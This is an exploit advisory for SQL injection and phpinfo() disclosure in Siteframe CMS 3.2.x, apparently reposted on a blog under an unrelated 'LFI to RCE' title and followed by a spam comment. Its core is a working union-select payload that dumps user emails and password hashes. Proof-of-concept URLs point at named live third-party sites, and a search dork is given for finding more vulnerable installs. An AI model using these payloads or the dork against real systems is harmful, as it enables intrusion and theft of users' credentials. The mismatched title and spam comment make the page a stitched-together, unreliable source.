LFI to RCE via access_log injection

Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vuln


[o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability

Software : Siteframe CMS version 3.2.x
Vendor : http://siteframe.org/
Download : http://sitefrane.org/downloads/
Author : NoGe



[o] Description
Siteframe™ is a lightweight content-management system
designed for the rapid deployment of community-based websites.
With Siteframe, a group of users can share stories and photographs,
create blogs, send email to one another, and participate in group activities.
Siteframe enables this by providing web-based content management
so that anyone can create content without needing to learn HTML.


[o] Vulnerable file
document.php


[o] Exploit
http://localhost/[path]/document.php?id=[SQL]
http://localhost/[path]/phpinfo.php


[o] Proof of concept
http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://digi-forum.com/frame/phpinfo.php
http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://myolympus.org/phpinfo.php


[o] Dork
"Powered by Siteframe"


[o] Notes
Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)


Comments

Joan Brown said…
This is a great post for anyone that needs help with finding legal advice. I found a fire insurance claim in the Los Angeles area that helped me get to the bottom of my civil suit.